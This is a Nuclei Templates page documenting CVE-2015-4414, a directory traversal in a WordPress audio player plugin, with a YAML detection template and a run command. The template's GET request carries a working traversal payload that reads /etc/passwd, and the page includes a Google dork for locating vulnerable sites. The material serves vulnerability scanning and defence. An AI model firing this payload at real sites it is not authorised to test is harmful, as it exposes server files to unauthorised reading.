Skip to content
Nuclei Templates

WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal

ID: CVE-2015-4414

Severity: medium

Author: daffainfo

Tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project

Description

Section titled “Description”

WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2015-4414


info:
  name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
  author: daffainfo
  severity: medium
  description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
  remediation: |
    Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37274
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
    - https://www.exploit-db.com/exploits/37274/
    - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
    - https://wpvulndb.com/vulnerabilities/8032
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-4414
    cwe-id: CWE-22
    epss-score: 0.12486
    epss-percentile: 0.95299
    cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: se_html5_album_audio_player_project
    product: se_html5_album_audio_player
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
  tags: cve2015,cve,wordpress,wp-plugin,lfi,edb,packetstorm,se_html5_album_audio_player_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a681a1e285c7e3c4ba1cebba7e5e6c9201a23255b93c254864422f76dd8baf4c022100d74dfd56c5cf095bed654b549638c1e6ef4bea5f52d6004f75fed80129aa2b73:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-4414.yaml"

View on Github